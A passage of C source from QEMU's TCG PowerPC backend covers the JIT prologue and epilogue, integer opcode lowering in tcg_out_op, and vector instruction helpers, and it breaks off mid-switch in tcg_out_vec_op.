tcg_out32(s, STWBRX | SAB(datalo, rbase, addrlo)); tcg_out32(s, ADDI | TAI(TCG_REG_TMP1, addrlo, 4)); tcg_out_shri64(s, TCG_REG_R0, datalo, 32); tcg_out32(s, STWBRX | SAB(TCG_REG_R0, rbase, TCG_REG_TMP1)); } else { tcg_out32(s, insn | SAB(datalo, rbase, addrlo)); } } #ifdef CONFIG_SOFTMMU add_qemu_ldst_label(s, false, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); #endif } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { int i; for (i = 0; i < count; ++i) { p[i] = NOP; } } /* Parameters for function call generation, used in tcg.c. */ #define TCG_TARGET_STACK_ALIGN 16 #define TCG_TARGET_EXTEND_ARGS 1 #ifdef _CALL_AIX # define LINK_AREA_SIZE (6 * SZR) # define LR_OFFSET (1 * SZR) # define TCG_TARGET_CALL_STACK_OFFSET (LINK_AREA_SIZE + 8 * SZR) #elif defined(TCG_TARGET_CALL_DARWIN) # define LINK_AREA_SIZE (6 * SZR) # define LR_OFFSET (2 * SZR) #elif TCG_TARGET_REG_BITS == 64 # if defined(_CALL_ELF) && _CALL_ELF == 2 # define LINK_AREA_SIZE (4 * SZR) # define LR_OFFSET (1 * SZR) # endif #else /* TCG_TARGET_REG_BITS == 32 */ # if defined(_CALL_SYSV) # define LINK_AREA_SIZE (2 * SZR) # define LR_OFFSET (1 * SZR) # endif #endif #ifndef LR_OFFSET # error "Unhandled abi" #endif #ifndef TCG_TARGET_CALL_STACK_OFFSET # define TCG_TARGET_CALL_STACK_OFFSET LINK_AREA_SIZE #endif #define CPU_TEMP_BUF_SIZE (CPU_TEMP_BUF_NLONGS * (int)sizeof(long)) #define REG_SAVE_SIZE ((int)ARRAY_SIZE(tcg_target_callee_save_regs) * SZR) #define FRAME_SIZE ((TCG_TARGET_CALL_STACK_OFFSET \ + TCG_STATIC_CALL_ARGS_SIZE \ + CPU_TEMP_BUF_SIZE \ + REG_SAVE_SIZE \ + TCG_TARGET_STACK_ALIGN - 1) \ & -TCG_TARGET_STACK_ALIGN) #define REG_SAVE_BOT (FRAME_SIZE - REG_SAVE_SIZE) static void tcg_target_qemu_prologue(TCGContext *s) { int i; #ifdef _CALL_AIX void **desc = (void **)s->code_ptr; desc[0] = desc + 2; /* entry point */ desc[1] = 0; /* environment pointer */ s->code_ptr = (void *)(desc + 2); /* skip over descriptor */ #endif tcg_set_frame(s, TCG_REG_CALL_STACK, REG_SAVE_BOT - CPU_TEMP_BUF_SIZE, CPU_TEMP_BUF_SIZE); /* Prologue */ tcg_out32(s, MFSPR | RT(TCG_REG_R0) | LR); tcg_out32(s, (SZR == 8 ? STDU : STWU) | SAI(TCG_REG_R1, TCG_REG_R1, -FRAME_SIZE)); for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); ++i) { tcg_out_st(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], TCG_REG_R1, REG_SAVE_BOT + i * SZR); } tcg_out_st(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_R1, FRAME_SIZE+LR_OFFSET); #ifndef CONFIG_SOFTMMU if (guest_base) { tcg_out_movi_int(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, guest_base, true); tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); } #endif tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); tcg_out32(s, MTSPR | RS(tcg_target_call_iarg_regs[1]) | CTR); if (USE_REG_TB) { tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_TB, tcg_target_call_iarg_regs[1]); } tcg_out32(s, BCCTR | BO_ALWAYS); /* Epilogue */ s->code_gen_epilogue = tb_ret_addr = s->code_ptr; tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_R1, FRAME_SIZE+LR_OFFSET); for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); ++i) { tcg_out_ld(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], TCG_REG_R1, REG_SAVE_BOT + i * SZR); } tcg_out32(s, MTSPR | RS(TCG_REG_R0) | LR); tcg_out32(s, ADDI | TAI(TCG_REG_R1, TCG_REG_R1, FRAME_SIZE)); tcg_out32(s, BCLR | BO_ALWAYS); } static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args) { TCGArg a0, a1, a2; int c; switch (opc) { case INDEX_op_exit_tb: tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R3, args[0]); tcg_out_b(s, 0, tb_ret_addr); break; case INDEX_op_goto_tb: if (s->tb_jmp_insn_offset) { /* Direct jump. */ if (TCG_TARGET_REG_BITS == 64) { /* Ensure the next insns are 8-byte aligned. */ if ((uintptr_t)s->code_ptr & 7) { tcg_out32(s, NOP); } s->tb_jmp_insn_offset[args[0]] = tcg_current_code_size(s); tcg_out32(s, ADDIS | TAI(TCG_REG_TB, TCG_REG_TB, 0)); tcg_out32(s, ADDI | TAI(TCG_REG_TB, TCG_REG_TB, 0)); } else { s->tb_jmp_insn_offset[args[0]] = tcg_current_code_size(s); tcg_out32(s, B); s->tb_jmp_reset_offset[args[0]] = tcg_current_code_size(s); break; } } else { /* Indirect jump. */ tcg_debug_assert(s->tb_jmp_insn_offset == NULL); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_TB, 0, (intptr_t)(s->tb_jmp_insn_offset + args[0])); } tcg_out32(s, MTSPR | RS(TCG_REG_TB) | CTR); tcg_out32(s, BCCTR | BO_ALWAYS); set_jmp_reset_offset(s, args[0]); if (USE_REG_TB) { /* For the unlinked case, need to reset TCG_REG_TB. */ c = -tcg_current_code_size(s); assert(c == (int16_t)c); tcg_out32(s, ADDI | TAI(TCG_REG_TB, TCG_REG_TB, c)); } break; case INDEX_op_goto_ptr: tcg_out32(s, MTSPR | RS(args[0]) | CTR); if (USE_REG_TB) { tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_TB, args[0]); } tcg_out32(s, ADDI | TAI(TCG_REG_R3, 0, 0)); tcg_out32(s, BCCTR | BO_ALWAYS); break; case INDEX_op_br: { TCGLabel *l = arg_label(args[0]); uint32_t insn = B; if (l->has_value) { insn |= reloc_pc24_val(s->code_ptr, l->u.value_ptr); } else { tcg_out_reloc(s, s->code_ptr, R_PPC_REL24, l, 0); } tcg_out32(s, insn); } break; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: tcg_out_mem_long(s, LBZ, LBZX, args[0], args[1], args[2]); break; case INDEX_op_ld8s_i32: case INDEX_op_ld8s_i64: tcg_out_mem_long(s, LBZ, LBZX, args[0], args[1], args[2]); tcg_out32(s, EXTSB | RS(args[0]) | RA(args[0])); break; case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: tcg_out_mem_long(s, LHZ, LHZX, args[0], args[1], args[2]); break; case INDEX_op_ld16s_i32: case INDEX_op_ld16s_i64: tcg_out_mem_long(s, LHA, LHAX, args[0], args[1], args[2]); break; case INDEX_op_ld_i32: case INDEX_op_ld32u_i64: tcg_out_mem_long(s, LWZ, LWZX, args[0], args[1], args[2]); break; case INDEX_op_ld32s_i64: tcg_out_mem_long(s, LWA, LWAX, args[0], args[1], args[2]); break; case INDEX_op_ld_i64: tcg_out_mem_long(s, LD, LDX, args[0], args[1], args[2]); break; case INDEX_op_st8_i32: case INDEX_op_st8_i64: tcg_out_mem_long(s, STB, STBX, args[0], args[1], args[2]); break; case INDEX_op_st16_i32: case INDEX_op_st16_i64: tcg_out_mem_long(s, STH, STHX, args[0], args[1], args[2]); break; case INDEX_op_st_i32: case INDEX_op_st32_i64: tcg_out_mem_long(s, STW, STWX, args[0], args[1], args[2]); break; case INDEX_op_st_i64: tcg_out_mem_long(s, STD, STDX, args[0], args[1], args[2]); break; case INDEX_op_add_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { do_addi_32: tcg_out_mem_long(s, ADDI, ADD, a0, a1, (int32_t)a2); } else { tcg_out32(s, ADD | TAB(a0, a1, a2)); } break; case INDEX_op_sub_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[1]) { if (const_args[2]) { tcg_out_movi(s, TCG_TYPE_I32, a0, a1 - a2); } else { tcg_out32(s, SUBFIC | TAI(a0, a2, a1)); } } else if (const_args[2]) { a2 = -a2; goto do_addi_32; } else { tcg_out32(s, SUBF | TAB(a0, a2, a1)); } break; case INDEX_op_and_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_andi32(s, a0, a1, a2); } else { tcg_out32(s, AND | SAB(a1, a0, a2)); } break; case INDEX_op_and_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_andi64(s, a0, a1, a2); } else { tcg_out32(s, AND | SAB(a1, a0, a2)); } break; case INDEX_op_or_i64: case INDEX_op_or_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_ori32(s, a0, a1, a2); } else { tcg_out32(s, OR | SAB(a1, a0, a2)); } break; case INDEX_op_xor_i64: case INDEX_op_xor_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_xori32(s, a0, a1, a2); } else { tcg_out32(s, XOR | SAB(a1, a0, a2)); } break; case INDEX_op_andc_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_andi32(s, a0, a1, ~a2); } else { tcg_out32(s, ANDC | SAB(a1, a0, a2)); } break; case INDEX_op_andc_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_andi64(s, a0, a1, ~a2); } else { tcg_out32(s, ANDC | SAB(a1, a0, a2)); } break; case INDEX_op_orc_i32: if (const_args[2]) { tcg_out_ori32(s, args[0], args[1], ~args[2]); break; } /* FALLTHRU */ case INDEX_op_orc_i64: tcg_out32(s, ORC | SAB(args[1], args[0], args[2])); break; case INDEX_op_eqv_i32: if (const_args[2]) { tcg_out_xori32(s, args[0], args[1], ~args[2]); break; } /* FALLTHRU */ case INDEX_op_eqv_i64: tcg_out32(s, EQV | SAB(args[1], args[0], args[2])); break; case INDEX_op_nand_i32: case INDEX_op_nand_i64: tcg_out32(s, NAND | SAB(args[1], args[0], args[2])); break; case INDEX_op_nor_i32: case INDEX_op_nor_i64: tcg_out32(s, NOR | SAB(args[1], args[0], args[2])); break; case INDEX_op_clz_i32: tcg_out_cntxz(s, TCG_TYPE_I32, CNTLZW, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_ctz_i32: tcg_out_cntxz(s, TCG_TYPE_I32, CNTTZW, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_ctpop_i32: tcg_out32(s, CNTPOPW | SAB(args[1], args[0], 0)); break; case INDEX_op_clz_i64: tcg_out_cntxz(s, TCG_TYPE_I64, CNTLZD, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_ctz_i64: tcg_out_cntxz(s, TCG_TYPE_I64, CNTTZD, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_ctpop_i64: tcg_out32(s, CNTPOPD | SAB(args[1], args[0], 0)); break; case INDEX_op_mul_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out32(s, MULLI | TAI(a0, a1, a2)); } else { tcg_out32(s, MULLW | TAB(a0, a1, a2)); } break; case INDEX_op_div_i32: tcg_out32(s, DIVW | TAB(args[0], args[1], args[2])); break; case INDEX_op_divu_i32: tcg_out32(s, DIVWU | TAB(args[0], args[1], args[2])); break; case INDEX_op_shl_i32: if (const_args[2]) { tcg_out_shli32(s, args[0], args[1], args[2]); } else { tcg_out32(s, SLW | SAB(args[1], args[0], args[2])); } break; case INDEX_op_shr_i32: if (const_args[2]) { tcg_out_shri32(s, args[0], args[1], args[2]); } else { tcg_out32(s, SRW | SAB(args[1], args[0], args[2])); } break; case INDEX_op_sar_i32: if (const_args[2]) { tcg_out32(s, SRAWI | RS(args[1]) | RA(args[0]) | SH(args[2])); } else { tcg_out32(s, SRAW | SAB(args[1], args[0], args[2])); } break; case INDEX_op_rotl_i32: if (const_args[2]) { tcg_out_rlw(s, RLWINM, args[0], args[1], args[2], 0, 31); } else { tcg_out32(s, RLWNM | SAB(args[1], args[0], args[2]) | MB(0) | ME(31)); } break; case INDEX_op_rotr_i32: if (const_args[2]) { tcg_out_rlw(s, RLWINM, args[0], args[1], 32 - args[2], 0, 31); } else { tcg_out32(s, SUBFIC | TAI(TCG_REG_R0, args[2], 32)); tcg_out32(s, RLWNM | SAB(args[1], args[0], TCG_REG_R0) | MB(0) | ME(31)); } break; case INDEX_op_brcond_i32: tcg_out_brcond(s, args[2], args[0], args[1], const_args[1], arg_label(args[3]), TCG_TYPE_I32); break; case INDEX_op_brcond_i64: tcg_out_brcond(s, args[2], args[0], args[1], const_args[1], arg_label(args[3]), TCG_TYPE_I64); break; case INDEX_op_brcond2_i32: tcg_out_brcond2(s, args, const_args); break; case INDEX_op_neg_i32: case INDEX_op_neg_i64: tcg_out32(s, NEG | RT(args[0]) | RA(args[1])); break; case INDEX_op_not_i32: case INDEX_op_not_i64: tcg_out32(s, NOR | SAB(args[1], args[0], args[1])); break; case INDEX_op_add_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { do_addi_64: tcg_out_mem_long(s, ADDI, ADD, a0, a1, a2); } else { tcg_out32(s, ADD | TAB(a0, a1, a2)); } break; case INDEX_op_sub_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[1]) { if (const_args[2]) { tcg_out_movi(s, TCG_TYPE_I64, a0, a1 - a2); } else { tcg_out32(s, SUBFIC | TAI(a0, a2, a1)); } } else if (const_args[2]) { a2 = -a2; goto do_addi_64; } else { tcg_out32(s, SUBF | TAB(a0, a2, a1)); } break; case INDEX_op_shl_i64: if (const_args[2]) { tcg_out_shli64(s, args[0], args[1], args[2]); } else { tcg_out32(s, SLD | SAB(args[1], args[0], args[2])); } break; case INDEX_op_shr_i64: if (const_args[2]) { tcg_out_shri64(s, args[0], args[1], args[2]); } else { tcg_out32(s, SRD | SAB(args[1], args[0], args[2])); } break; case INDEX_op_sar_i64: if (const_args[2]) { int sh = SH(args[2] & 0x1f) | (((args[2] >> 5) & 1) << 1); tcg_out32(s, SRADI | RA(args[0]) | RS(args[1]) | sh); } else { tcg_out32(s, SRAD | SAB(args[1], args[0], args[2])); } break; case INDEX_op_rotl_i64: if (const_args[2]) { tcg_out_rld(s, RLDICL, args[0], args[1], args[2], 0); } else { tcg_out32(s, RLDCL | SAB(args[1], args[0], args[2]) | MB64(0)); } break; case INDEX_op_rotr_i64: if (const_args[2]) { tcg_out_rld(s, RLDICL, args[0], args[1], 64 - args[2], 0); } else { tcg_out32(s, SUBFIC | TAI(TCG_REG_R0, args[2], 64)); tcg_out32(s, RLDCL | SAB(args[1], args[0], TCG_REG_R0) | MB64(0)); } break; case INDEX_op_mul_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out32(s, MULLI | TAI(a0, a1, a2)); } else { tcg_out32(s, MULLD | TAB(a0, a1, a2)); } break; case INDEX_op_div_i64: tcg_out32(s, DIVD | TAB(args[0], args[1], args[2])); break; case INDEX_op_divu_i64: tcg_out32(s, DIVDU | TAB(args[0], args[1], args[2])); break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, args, false); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args, true); break; case INDEX_op_qemu_st_i32: tcg_out_qemu_st(s, args, false); break; case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args, true); break; case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: c = EXTSB; goto gen_ext; case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: c = EXTSH; goto gen_ext; case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: c = EXTSW; goto gen_ext; gen_ext: tcg_out32(s, c | RS(args[1]) | RA(args[0])); break; case INDEX_op_extu_i32_i64: tcg_out_ext32u(s, args[0], args[1]); break; case INDEX_op_setcond_i32: tcg_out_setcond(s, TCG_TYPE_I32, args[3], args[0], args[1], args[2], const_args[2]); break; case INDEX_op_setcond_i64: tcg_out_setcond(s, TCG_TYPE_I64, args[3], args[0], args[1], args[2], const_args[2]); break; case INDEX_op_setcond2_i32: tcg_out_setcond2(s, args, const_args); break; case INDEX_op_bswap16_i32: case INDEX_op_bswap16_i64: a0 = args[0], a1 = args[1]; /* a1 = abcd */ if (a0 != a1) { /* a0 = (a1 r<< 24) & 0xff # 000c */ tcg_out_rlw(s, RLWINM, a0, a1, 24, 24, 31); /* a0 = (a0 & ~0xff00) | (a1 r<< 8) & 0xff00 # 00dc */ tcg_out_rlw(s, RLWIMI, a0, a1, 8, 16, 23); } else { /* r0 = (a1 r<< 8) & 0xff00 # 00d0 */ tcg_out_rlw(s, RLWINM, TCG_REG_R0, a1, 8, 16, 23); /* a0 = (a1 r<< 24) & 0xff # 000c */ tcg_out_rlw(s, RLWINM, a0, a1, 24, 24, 31); /* a0 = a0 | r0 # 00dc */ tcg_out32(s, OR | SAB(TCG_REG_R0, a0, a0)); } break; case INDEX_op_bswap32_i32: case INDEX_op_bswap32_i64: /* Stolen from gcc's builtin_bswap32 */ a1 = args[1]; a0 = args[0] == a1 ? TCG_REG_R0 : args[0]; /* a1 = args[1] # abcd */ /* a0 = rotate_left (a1, 8) # bcda */ tcg_out_rlw(s, RLWINM, a0, a1, 8, 0, 31); /* a0 = (a0 & ~0xff000000) | ((a1 r<< 24) & 0xff000000) # dcda */ tcg_out_rlw(s, RLWIMI, a0, a1, 24, 0, 7); /* a0 = (a0 & ~0x0000ff00) | ((a1 r<< 24) & 0x0000ff00) # dcba */ tcg_out_rlw(s, RLWIMI, a0, a1, 24, 16, 23); if (a0 == TCG_REG_R0) { tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); } break; case INDEX_op_bswap64_i64: a0 = args[0], a1 = args[1], a2 = TCG_REG_R0; if (a0 == a1) { a0 = TCG_REG_R0; a2 = a1; } /* a1 = # abcd efgh */ /* a0 = rl32(a1, 8) # 0000 fghe */ tcg_out_rlw(s, RLWINM, a0, a1, 8, 0, 31); /* a0 = dep(a0, rl32(a1, 24), 0xff000000) # 0000 hghe */ tcg_out_rlw(s, RLWIMI, a0, a1, 24, 0, 7); /* a0 = dep(a0, rl32(a1, 24), 0x0000ff00) # 0000 hgfe */ tcg_out_rlw(s, RLWIMI, a0, a1, 24, 16, 23); /* a0 = rl64(a0, 32) # hgfe 0000 */ /* a2 = rl64(a1, 32) # efgh abcd */ tcg_out_rld(s, RLDICL, a0, a0, 32, 0); tcg_out_rld(s, RLDICL, a2, a1, 32, 0); /* a0 = dep(a0, rl32(a2, 8), 0xffffffff) # hgfe bcda */ tcg_out_rlw(s, RLWIMI, a0, a2, 8, 0, 31); /* a0 = dep(a0, rl32(a2, 24), 0xff000000) # hgfe dcda */ tcg_out_rlw(s, RLWIMI, a0, a2, 24, 0, 7); /* a0 = dep(a0, rl32(a2, 24), 0x0000ff00) # hgfe dcba */ tcg_out_rlw(s, RLWIMI, a0, a2, 24, 16, 23); if (a0 == 0) { tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); } break; case INDEX_op_deposit_i32: if (const_args[2]) { uint32_t mask = ((2u << (args[4] - 1)) - 1) << args[3]; tcg_out_andi32(s, args[0], args[0], ~mask); } else { tcg_out_rlw(s, RLWIMI, args[0], args[2], args[3], 32 - args[3] - args[4], 31 - args[3]); } break; case INDEX_op_deposit_i64: if (const_args[2]) { uint64_t mask = ((2ull << (args[4] - 1)) - 1) << args[3]; tcg_out_andi64(s, args[0], args[0], ~mask); } else { tcg_out_rld(s, RLDIMI, args[0], args[2], args[3], 64 - args[3] - args[4]); } break; case INDEX_op_extract_i32: tcg_out_rlw(s, RLWINM, args[0], args[1], 32 - args[2], 32 - args[3], 31); break; case INDEX_op_extract_i64: tcg_out_rld(s, RLDICL, args[0], args[1], 64 - args[2], 64 - args[3]); break; case INDEX_op_movcond_i32: tcg_out_movcond(s, TCG_TYPE_I32, args[5], args[0], args[1], args[2], args[3], args[4], const_args[2]); break; case INDEX_op_movcond_i64: tcg_out_movcond(s, TCG_TYPE_I64, args[5], args[0], args[1], args[2], args[3], args[4], const_args[2]); break; #if TCG_TARGET_REG_BITS == 64 case INDEX_op_add2_i64: #else case INDEX_op_add2_i32: #endif /* Note that the CA bit is defined based on the word size of the environment. So in 64-bit mode it's always carry-out of bit 63. The fallback code using deposit works just as well for 32-bit. */ a0 = args[0], a1 = args[1]; if (a0 == args[3] || (!const_args[5] && a0 == args[5])) { a0 = TCG_REG_R0; } if (const_args[4]) { tcg_out32(s, ADDIC | TAI(a0, args[2], args[4])); } else { tcg_out32(s, ADDC | TAB(a0, args[2], args[4])); } if (const_args[5]) { tcg_out32(s, (args[5] ? ADDME : ADDZE) | RT(a1) | RA(args[3])); } else { tcg_out32(s, ADDE | TAB(a1, args[3], args[5])); } if (a0 != args[0]) { tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); } break; #if TCG_TARGET_REG_BITS == 64 case INDEX_op_sub2_i64: #else case INDEX_op_sub2_i32: #endif a0 = args[0], a1 = args[1]; if (a0 == args[5] || (!const_args[3] && a0 == args[3])) { a0 = TCG_REG_R0; } if (const_args[2]) { tcg_out32(s, SUBFIC | TAI(a0, args[4], args[2])); } else { tcg_out32(s, SUBFC | TAB(a0, args[4], args[2])); } if (const_args[3]) { tcg_out32(s, (args[3] ? SUBFME : SUBFZE) | RT(a1) | RA(args[5])); } else { tcg_out32(s, SUBFE | TAB(a1, args[5], args[3])); } if (a0 != args[0]) { tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); } break; case INDEX_op_muluh_i32: tcg_out32(s, MULHWU | TAB(args[0], args[1], args[2])); break; case INDEX_op_mulsh_i32: tcg_out32(s, MULHW | TAB(args[0], args[1], args[2])); break; case INDEX_op_muluh_i64: tcg_out32(s, MULHDU | TAB(args[0], args[1], args[2])); break; case INDEX_op_mulsh_i64: tcg_out32(s, MULHD | TAB(args[0], args[1], args[2])); break; case INDEX_op_mb: tcg_out_mb(s, args[0]); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. */ default: tcg_abort(); } } int tcg_can_emit_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece) { switch (opc) { case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_andc_vec: case INDEX_op_not_vec: return 1; case INDEX_op_orc_vec: return have_isa_2_07; case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_smax_vec: case INDEX_op_smin_vec: case INDEX_op_umax_vec: case INDEX_op_umin_vec: case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: return vece <= MO_32 || have_isa_2_07; case INDEX_op_ssadd_vec: case INDEX_op_sssub_vec: case INDEX_op_usadd_vec: case INDEX_op_ussub_vec: return vece <= MO_32; case INDEX_op_cmp_vec: case INDEX_op_shli_vec: case INDEX_op_shri_vec: case INDEX_op_sari_vec: return vece <= MO_32 || have_isa_2_07 ? -1 : 0; case INDEX_op_neg_vec: return vece >= MO_32 && have_isa_3_00; case INDEX_op_mul_vec: switch (vece) { case MO_8: case MO_16: return -1; case MO_32: return have_isa_2_07 ? 1 : -1; } return 0; case INDEX_op_bitsel_vec: return have_vsx; default: return 0; } } static bool tcg_out_dup_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg dst, TCGReg src) { tcg_debug_assert(dst >= TCG_REG_V0); /* Splat from integer reg allowed via constraints for v3.00. */ if (src < TCG_REG_V0) { tcg_debug_assert(have_isa_3_00); switch (vece) { case MO_64: tcg_out32(s, MTVSRDD | VRT(dst) | RA(src) | RB(src)); return true; case MO_32: tcg_out32(s, MTVSRWS | VRT(dst) | RA(src)); return true; default: /* Fail, so that we fall back on either dupm or mov+dup. */ return false; } } /* * Recall we use (or emulate) VSX integer loads, so the integer is * right justified within the left (zero-index) double-word. */ switch (vece) { case MO_8: tcg_out32(s, VSPLTB | VRT(dst) | VRB(src) | (7 << 16)); break; case MO_16: tcg_out32(s, VSPLTH | VRT(dst) | VRB(src) | (3 << 16)); break; case MO_32: tcg_out32(s, VSPLTW | VRT(dst) | VRB(src) | (1 << 16)); break; case MO_64: if (have_vsx) { tcg_out32(s, XXPERMDI | VRT(dst) | VRA(src) | VRB(src)); break; } tcg_out_vsldoi(s, TCG_VEC_TMP1, src, src, 8); tcg_out_vsldoi(s, dst, TCG_VEC_TMP1, src, 8); break; default: g_assert_not_reached(); } return true; } static bool tcg_out_dupm_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg out, TCGReg base, intptr_t offset) { int elt; tcg_debug_assert(out >= TCG_REG_V0); switch (vece) { case MO_8: if (have_isa_3_00) { tcg_out_mem_long(s, LXV, LVX, out, base, offset & -16); } else { tcg_out_mem_long(s, 0, LVEBX, out, base, offset); } elt = extract32(offset, 0, 4); #ifndef HOST_WORDS_BIGENDIAN elt ^= 15; #endif tcg_out32(s, VSPLTB | VRT(out) | VRB(out) | (elt << 16)); break; case MO_16: tcg_debug_assert((offset & 1) == 0); if (have_isa_3_00) { tcg_out_mem_long(s, LXV | 8, LVX, out, base, offset & -16); } else { tcg_out_mem_long(s, 0, LVEHX, out, base, offset); } elt = extract32(offset, 1, 3); #ifndef HOST_WORDS_BIGENDIAN elt ^= 7; #endif tcg_out32(s, VSPLTH | VRT(out) | VRB(out) | (elt << 16)); break; case MO_32: if (have_isa_3_00) { tcg_out_mem_long(s, 0, LXVWSX, out, base, offset); break; } tcg_debug_assert((offset & 3) == 0); tcg_out_mem_long(s, 0, LVEWX, out, base, offset); elt = extract32(offset, 2, 2); #ifndef HOST_WORDS_BIGENDIAN elt ^= 3; #endif tcg_out32(s, VSPLTW | VRT(out) | VRB(out) | (elt << 16)); break; case MO_64: if (have_vsx) { tcg_out_mem_long(s, 0, LXVDSX, out, base, offset); break; } tcg_debug_assert((offset & 7) == 0); tcg_out_mem_long(s, 0, LVX, out, base, offset & -16); tcg_out_vsldoi(s, TCG_VEC_TMP1, out, out, 8); elt = extract32(offset, 3, 1); #ifndef HOST_WORDS_BIGENDIAN elt = !elt; #endif if (elt) { tcg_out_vsldoi(s, out, out, TCG_VEC_TMP1, 8); } else { tcg_out_vsldoi(s, out, TCG_VEC_TMP1, out, 8); } break; default: g_assert_not_reached(); } return true; } static void tcg_out_vec_op(TCGContext *s, TCGOpcode opc, unsigned vecl, unsigned vece, const TCGArg *args, const int *const_args) { static const uint32_t add_op[4] = { VADDUBM, VADDUHM, VADDUWM, VADDUDM }, sub_op[4] = { VSUBUBM, VSUBUHM, VSUBUWM, VSUBUDM }, neg_op[4] = { 0, 0, VNEGW, VNEGD }, eq_op[4] = { VCMPEQUB, VCMPEQUH, VCMPEQUW, VCMPEQUD }, ne_op[4] = { VCMPNEB, VCMPNEH, VCMPNEW, 0 }, gts_op[4] = { VCMPGTSB, VCMPGTSH, VCMPGTSW, VCMPGTSD }, gtu_op[4] = { VCMPGTUB, VCMPGTUH, VCMPGTUW, VCMPGTUD }, ssadd_op[4] = { VADDSBS, VADDSHS, VADDSWS, 0 }, usadd_op[4] = { VADDUBS, VADDUHS, VADDUWS, 0 }, sssub_op[4] = { VSUBSBS, VSUBSHS, VSUBSWS, 0 }, ussub_op[4] = { VSUBUBS, VSUBUHS, VSUBUWS, 0 }, umin_op[4] = { VMINUB, VMINUH, VMINUW, VMINUD }, smin_op[4] = { VMINSB, VMINSH, VMINSW, VMINSD }, umax_op[4] = { VMAXUB, VMAXUH, VMAXUW, VMAXUD }, smax_op[4] = { VMAXSB, VMAXSH, VMAXSW, VMAXSD }, shlv_op[4] = { VSLB, VSLH, VSLW, VSLD }, shrv_op[4] = { VSRB, VSRH, VSRW, VSRD }, sarv_op[4] = { VSRAB, VSRAH, VSRAW, VSRAD }, mrgh_op[4] = { VMRGHB, VMRGHH, VMRGHW, 0 }, mrgl_op[4] = { VMRGLB, VMRGLH, VMRGLW, 0 }, muleu_op[4] = { VMULEUB, VMULEUH, VMULEUW, 0 }, mulou_op[4] = { VMULOUB, VMULOUH, VMULOUW, 0 }, pkum_op[4] = { VPKUHUM, VPKUWUM, 0, 0 }, rotl_op[4] = { VRLB, VRLH, VRLW, VRLD }; TCGType type = vecl + TCG_TYPE_V64; TCGArg a0 = args[0], a1 = args[1], a2 = args[2]; uint32_t insn; switch (opc) { case INDEX_op_ld_vec: tcg_out_ld(s, type, a0, a1, a2); return; case INDEX_op_st_vec: tcg_out_st(s, type, a0, a1, a2); return; case INDEX_op_dupm_vec: tcg_out_dupm_vec(s, type, vece, a0, a1, a2); return; case INDEX_op_add_vec: insn = add_op[vece]; break; case INDEX_op_sub_vec: insn = sub_op[vece]; break; case INDEX_op_neg_vec: insn = neg_op[vece]; a2 = a1; a1 = 0; break; case INDEX_op_mul_vec: tcg_debug_assert(vece == MO_32 && have_isa_2_07); insn = VMULUWM; break; case INDEX_op_ssadd_vec: insn = ssadd_op[vece]; break; case INDEX_op_sssub_vec: insn = sssub_op[vece]; break; case INDEX_op_usadd_vec: insn = usadd_op[vece]; break; case INDEX_op_ussub_vec: insn = ussub_op[vece]; break; case INDEX_op_smin_vec: insn = smin_op[vece]; break; case INDEX_op_umin_vec: insn = umin_op[vece]; break; case INDEX_op_smax_vec: insn = smax_op[vece]; break; case INDEX_op_umax_vec: insn = umax_op[vece]; break; case 